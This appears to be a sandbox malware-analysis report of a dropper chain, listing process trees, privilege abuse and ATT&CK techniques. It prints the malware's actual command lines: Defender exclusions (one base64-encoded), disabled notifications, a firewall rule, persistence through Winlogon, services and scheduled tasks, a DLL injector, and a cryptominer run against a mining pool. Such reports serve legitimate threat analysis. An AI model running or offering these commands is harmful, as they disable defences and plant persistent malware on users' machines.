Processes:

regedit.exe

pid process

5428 regedit.exe

pid	process
5428	regedit.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

ngrok.execrazyCore.exesoftcore-shd-lavacrypt.exepowershell.exepowershell.exepowershell.exe288c47bbc1871b439df19ff4df68f076.exepowershell.exepowershell.exe.exe288c47bbc1871b439df19ff4df68f076.exepowershell.exe

pid	process
3256	ngrok.exe
3256	ngrok.exe
3256	ngrok.exe
3256	ngrok.exe
4576	crazyCore.exe
4576	crazyCore.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3188	powershell.exe
3188	powershell.exe
3188	powershell.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
3948	softcore-shd-lavacrypt.exe
6436	powershell.exe
6436	powershell.exe
6436	powershell.exe
5652	powershell.exe
5652	powershell.exe
3096	288c47bbc1871b439df19ff4df68f076.exe
3096	288c47bbc1871b439df19ff4df68f076.exe
6160	powershell.exe
6160	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
6160	powershell.exe
6288	.exe
6288	.exe
6372	288c47bbc1871b439df19ff4df68f076.exe
6372	288c47bbc1871b439df19ff4df68f076.exe
6372	288c47bbc1871b439df19ff4df68f076.exe
6372	288c47bbc1871b439df19ff4df68f076.exe
6372	288c47bbc1871b439df19ff4df68f076.exe
6372	288c47bbc1871b439df19ff4df68f076.exe
6372	288c47bbc1871b439df19ff4df68f076.exe
6372	288c47bbc1871b439df19ff4df68f076.exe
6372	288c47bbc1871b439df19ff4df68f076.exe
6372	288c47bbc1871b439df19ff4df68f076.exe
5580	powershell.exe
5580	powershell.exe

Suspicious use of AdjustPrivilegeToken 30 IoCs

Processes:

4363463463464363463463463.exenet.execrazyCore.exesoftcore-shd-lavacrypt.exepowershell.exeBLHisbnd.exetest.exeBLHisbnd.exepowershell.exepowershell.exevbc.exema.exesvchost.exe288c47bbc1871b439df19ff4df68f076.exepowershell.exepowershell.exe.exepowershell.exepowershell.exevbc.exepowershell.exepowershell.exepowershell.exepowershell.execsrss.exeTags.exe

description	pid	process
Token: SeDebugPrivilege	1724	4363463463464363463463463.exe
Token: SeDebugPrivilege	4512	net.exe
Token: SeDebugPrivilege	4576	crazyCore.exe
Token: SeDebugPrivilege	3948	softcore-shd-lavacrypt.exe
Token: SeDebugPrivilege	3188	powershell.exe
Token: SeDebugPrivilege	4512	net.exe
Token: SeDebugPrivilege	852	BLHisbnd.exe
Token: SeDebugPrivilege	4512	test.exe
Token: SeDebugPrivilege	852	BLHisbnd.exe
Token: SeDebugPrivilege	5384	BLHisbnd.exe
Token: SeDebugPrivilege	6436	powershell.exe
Token: SeDebugPrivilege	5652	powershell.exe
Token: SeDebugPrivilege	6648	vbc.exe
Token: SeDebugPrivilege	5168	ma.exe
Token: SeDebugPrivilege	2844	svchost.exe
Token: SeDebugPrivilege	3096	288c47bbc1871b439df19ff4df68f076.exe
Token: SeImpersonatePrivilege	3096	288c47bbc1871b439df19ff4df68f076.exe
Token: SeDebugPrivilege	6160	powershell.exe
Token: SeDebugPrivilege	4760	powershell.exe
Token: SeDebugPrivilege	6288	.exe
Token: SeDebugPrivilege	5580	powershell.exe
Token: SeDebugPrivilege	6120	powershell.exe
Token: SeLockMemoryPrivilege	4932	vbc.exe
Token: SeLockMemoryPrivilege	4932	vbc.exe
Token: SeDebugPrivilege	5240	powershell.exe
Token: SeDebugPrivilege	6516	powershell.exe
Token: SeDebugPrivilege	6216	powershell.exe
Token: SeDebugPrivilege	1716	powershell.exe
Token: SeSystemEnvironmentPrivilege	3196	csrss.exe
Token: SeDebugPrivilege	4464	Tags.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

crazyCore.exevbc.exe

pid process

4576 crazyCore.exe
4932 vbc.exe

pid	process
4576	crazyCore.exe
4932	vbc.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

4363463463464363463463463.execrazyCore.execmd.execmd.execmd.exenet.exe288c47bbc1871b439df19ff4df68f00076.exesoftcore-shd-lavacrypt.execmd.exe

description	pid	process	target process
PID 1724 wrote to memory of 3256	1724	4363463463464363463463463.exe	ngrok.exe
PID 1724 wrote to memory of 3256	1724	4363463463464363463463463.exe	ngrok.exe
PID 1724 wrote to memory of 4512	1724	4363463463464363463463463.exe	net.exe
PID 1724 wrote to memory of 4512	1724	4363463463464363463463463.exe	net.exe
PID 1724 wrote to memory of 4512	1724	4363463463464363463463463.exe	net.exe
PID 1724 wrote to memory of 4576	1724	4363463463464363463463463.exe	crazyCore.exe
PID 1724 wrote to memory of 4576	1724	4363463463464363463463463.exe	crazyCore.exe
PID 1724 wrote to memory of 3948	1724	4363463463464363463463463.exe	softcore-shd-lavacrypt.exe
PID 1724 wrote to memory of 3948	1724	4363463463464363463463463.exe	softcore-shd-lavacrypt.exe
PID 1724 wrote to memory of 2976	1724	4363463463464363463463463.exe	sdp.exe
PID 1724 wrote to memory of 2976	1724	4363463463464363463463463.exe	sdp.exe
PID 1724 wrote to memory of 2976	1724	4363463463464363463463463.exe	sdp.exe
PID 4576 wrote to memory of 3504	4576	crazyCore.exe	cmd.exe
PID 4576 wrote to memory of 3504	4576	crazyCore.exe	cmd.exe
PID 3504 wrote to memory of 2420	3504	cmd.exe	reg.exe
PID 3504 wrote to memory of 2420	3504	cmd.exe	reg.exe
PID 4576 wrote to memory of 3264	4576	crazyCore.exe	cmd.exe
PID 4576 wrote to memory of 3264	4576	crazyCore.exe	cmd.exe
PID 3264 wrote to memory of 4536	3264	cmd.exe	reg.exe
PID 3264 wrote to memory of 4536	3264	cmd.exe	reg.exe
PID 4576 wrote to memory of 3820	4576	crazyCore.exe	cmd.exe
PID 4576 wrote to memory of 3820	4576	crazyCore.exe	cmd.exe
PID 3820 wrote to memory of 3936	3820	cmd.exe	attrib.exe
PID 3820 wrote to memory of 3936	3820	cmd.exe	attrib.exe
PID 3820 wrote to memory of 3188	3820	cmd.exe	powershell.exe
PID 3820 wrote to memory of 3188	3820	cmd.exe	powershell.exe
PID 4512 wrote to memory of 852	4512	net.exe	BLHisbnd.exe
PID 4512 wrote to memory of 852	4512	net.exe	BLHisbnd.exe
PID 4512 wrote to memory of 852	4512	net.exe	BLHisbnd.exe
PID 4512 wrote to memory of 2352	4512	net.exe	net.exe
PID 4512 wrote to memory of 2352	4512	net.exe	net.exe
PID 4512 wrote to memory of 2352	4512	net.exe	net.exe
PID 4512 wrote to memory of 2352	4512	net.exe	net.exe
PID 4512 wrote to memory of 2352	4512	net.exe	net.exe
PID 4512 wrote to memory of 2352	4512	net.exe	net.exe
PID 4512 wrote to memory of 2352	4512	net.exe	net.exe
PID 4512 wrote to memory of 2352	4512	net.exe	net.exe
PID 4512 wrote to memory of 2352	4512	net.exe	net.exe
PID 4512 wrote to memory of 2352	4512	net.exe	net.exe
PID 1724 wrote to memory of 2964	1724	4363463463464363463463463.exe	288c47bbc1871b439df19ff4df68f00076.exe
PID 1724 wrote to memory of 2964	1724	4363463463464363463463463.exe	288c47bbc1871b439df19ff4df68f00076.exe
PID 1724 wrote to memory of 2964	1724	4363463463464363463463463.exe	288c47bbc1871b439df19ff4df68f00076.exe
PID 2964 wrote to memory of 4932	2964	288c47bbc1871b439df19ff4df68f00076.exe	ISetup4.exe
PID 2964 wrote to memory of 4932	2964	288c47bbc1871b439df19ff4df68f00076.exe	ISetup4.exe
PID 2964 wrote to memory of 4932	2964	288c47bbc1871b439df19ff4df68f00076.exe	ISetup4.exe
PID 1724 wrote to memory of 924	1724	4363463463464363463463463.exe	qauasariscrypted.exe
PID 1724 wrote to memory of 924	1724	4363463463464363463463463.exe	qauasariscrypted.exe
PID 2964 wrote to memory of 3096	2964	288c47bbc1871b439df19ff4df68f00076.exe	288c47bbc1871b439df19ff4df68f076.exe
PID 2964 wrote to memory of 3096	2964	288c47bbc1871b439df19ff4df68f00076.exe	288c47bbc1871b439df19ff4df68f076.exe
PID 2964 wrote to memory of 3096	2964	288c47bbc1871b439df19ff4df68f00076.exe	288c47bbc1871b439df19ff4df68f076.exe
PID 1724 wrote to memory of 460	1724	4363463463464363463463463.exe	cp.exe
PID 1724 wrote to memory of 460	1724	4363463463464363463463463.exe	cp.exe
PID 1724 wrote to memory of 460	1724	4363463463464363463463463.exe	cp.exe
PID 1724 wrote to memory of 4512	1724	4363463463464363463463463.exe	test.exe
PID 1724 wrote to memory of 4512	1724	4363463463464363463463463.exe	test.exe
PID 1724 wrote to memory of 4512	1724	4363463463464363463463463.exe	test.exe
PID 3948 wrote to memory of 4872	3948	softcore-shd-lavacrypt.exe	cmd.exe
PID 3948 wrote to memory of 4872	3948	softcore-shd-lavacrypt.exe	cmd.exe
PID 3948 wrote to memory of 1716	3948	softcore-shd-lavacrypt.exe	cmd.exe
PID 3948 wrote to memory of 1716	3948	softcore-shd-lavacrypt.exe	cmd.exe
PID 4576 wrote to memory of 4184	4576	crazyCore.exe	cmd.exe
PID 4576 wrote to memory of 4184	4576	crazyCore.exe	cmd.exe
PID 4184 wrote to memory of 724	4184	cmd.exe	sc.exe
PID 4184 wrote to memory of 724	4184	cmd.exe	sc.exe

System policy modification 1 TTPs 1 IoCs
evasion

Modify Registry
T1112

Processes:

svchost.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" svchost.exe
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

3936 attrib.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	svchost.exe

pid	process
3936	attrib.exe

C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1724

C:\Users\Admin\AppData\Local\Temp\Files\ngrok.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ngrok.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3256

C:\Users\Admin\AppData\Local\Temp\Files\net.exe
"C:\Users\Admin\AppData\Local\Temp\Files\net.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4512

C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe
"C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:852

C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe
"C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5384

C:\Users\Admin\AppData\Local\Temp\Files\net.exe
"C:\Users\Admin\AppData\Local\Temp\Files\net.exe"
3⤵
- Executes dropped EXE
PID:2352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 344
4⤵
- Program crash
PID:4632

C:\Users\Admin\AppData\Local\Temp\Files\crazyCore.exe
"C:\Users\Admin\AppData\Local\Temp\Files\crazyCore.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4576

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f /reg:64
3⤵
- Suspicious use of WriteProcessMemory
PID:3504

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v DisableNotifications /t REG_DWORD /d 1 /f /reg:64
4⤵
- Modifies Windows Defender notification settings
PID:2420

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v Enabled /t REG_DWORD /d 0 /f /reg:64
3⤵
- Suspicious use of WriteProcessMemory
PID:3264

C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v Enabled /t REG_DWORD /d 0 /f /reg:64
4⤵
PID:4536

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c mkdir \\.\C:\ProgramData\Nul & attrib +r +h +s \\.\C:\ProgramData\Nul & powershell -Command Add-MpPreference -ExclusionPath @('C:\ProgramData', 'C:\Users\Admin\AppData\Local\Temp\Files')
3⤵
- Suspicious use of WriteProcessMemory
PID:3820

C:\Windows\system32\attrib.exe
attrib +r +h +s \\.\C:\ProgramData\Nul
4⤵
- Sets file to hidden
- Views/modifies file attributes
PID:3936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath @('C:\ProgramData', 'C:\Users\Admin\AppData\Local\Temp\Files')
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3188

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c sc create "Nul" binpath="C:\Windows\system32\cmd.exe /c \"C:\ProgramData\Nul\Null.exe\"" start="auto"
3⤵
- Suspicious use of WriteProcessMemory
PID:4184

C:\Windows\system32\sc.exe
sc create "Nul" binpath="C:\Windows\system32\cmd.exe /c \"C:\ProgramData\Nul\Null.exe\"" start="auto"
4⤵
- Launches sc.exe
PID:724

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Nul" /tr "C:\ProgramData\Nul\Null.exe"
3⤵
PID:4168

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Nul" /tr "C:\ProgramData\Nul\Null.exe"
4⤵
- Creates scheduled task(s)
PID:5448

C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe, C:\ProgramData\Nul\Null.exe," /f /reg:64
3⤵
PID:2820

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe, C:\ProgramData\Nul\Null.exe," /f /reg:64
4⤵
- Modifies WinLogon for persistence
PID:2816

C:\Users\Admin\AppData\Local\Temp\Files\softcore-shd-lavacrypt.exe
"C:\Users\Admin\AppData\Local\Temp\Files\softcore-shd-lavacrypt.exe"
2⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3948

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Roaming\svchost.exe"' & exit
3⤵
PID:4872

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Roaming\svchost.exe"'
4⤵
- Creates scheduled task(s)
PID:6136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp60D8.tmp.bat""
3⤵
PID:1716

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:5720

C:\Users\Admin\AppData\Roaming\svchost.exe
"C:\Users\Admin\AppData\Roaming\svchost.exe"
4⤵
- UAC bypass
- Windows security bypass
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:2844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\svchost.exe" -Force
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4760

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
5⤵
PID:4276

C:\Users\Admin\AppData\Local\Temp\Files\sdp.exe
"C:\Users\Admin\AppData\Local\Temp\Files\sdp.exe"
2⤵
- Executes dropped EXE
PID:2976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2976 -s 1004
3⤵
- Program crash
PID:5044

C:\Users\Admin\AppData\Local\Temp\Files\288c47bbc1871b439df19ff4df68f00076.exe
"C:\Users\Admin\AppData\Local\Temp\Files\288c47bbc1871b439df19ff4df68f00076.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2964

C:\Users\Admin\AppData\Local\Temp\ISetup4.exe
"C:\Users\Admin\AppData\Local\Temp\ISetup4.exe"
3⤵
- Executes dropped EXE
PID:4932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 504
4⤵
- Program crash
PID:2576

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3096

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5652

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
4⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:6372

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6160

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:5776

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
PID:4904

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6120

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5240

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Suspicious use of AdjustPrivilegeToken
PID:3196

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6516

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:4920

C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
6⤵
PID:3960

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6216

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1716

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
6⤵
- Executes dropped EXE
PID:5740

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:2156

C:\Users\Admin\AppData\Local\Temp\Files\qauasariscrypted.exe
"C:\Users\Admin\AppData\Local\Temp\Files\qauasariscrypted.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:924

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6436

C:\Windows\regedit.exe
"C:\Windows\regedit.exe"
3⤵
- Runs regedit.exe
PID:5428

C:\Windows\System32\notepad.exe
"C:\Windows\System32\notepad.exe"
3⤵
PID:3620

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
3⤵
PID:6580

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:6648

C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
"C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:460

C:\Users\Admin\AppData\Local\Temp\Files\test.exe
"C:\Users\Admin\AppData\Local\Temp\Files\test.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4512

C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5168

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB3BB.tmp.bat""
3⤵
PID:3036

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:6104

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6288

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
5⤵
PID:6684

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
6⤵
- Creates scheduled task(s)
PID:3104

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
5⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4932

C:\Users\Admin\AppData\Local\Temp\Files\ce0b953269c74bc.exe
"C:\Users\Admin\AppData\Local\Temp\Files\ce0b953269c74bc.exe"
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5224

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:2172

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:528

C:\Users\Admin\AppData\Local\Temp\Files\nine.exe
"C:\Users\Admin\AppData\Local\Temp\Files\nine.exe"
2⤵
- Executes dropped EXE
PID:1188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 448
3⤵
- Program crash
PID:1540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2976 -ip 2976
1⤵
PID:3444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2352 -ip 2352
1⤵
PID:3056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4932 -ip 4932
1⤵
PID:1120

C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
C:\Users\Admin\AppData\Local\Temp\One_Dragon_Center\MSI.CentralServer.exe
1⤵
- Executes dropped EXE
PID:7032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVABhAGcAcwAuAGUAeABlADsA
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5580

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1188 -ip 1188
1⤵
PID:804

C:\Users\Admin\AppData\Local\Remaining\njnvh\Tags.exe
C:\Users\Admin\AppData\Local\Remaining\njnvh\Tags.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4464

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

PowerShell

System Services

Service Execution

Scripting

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

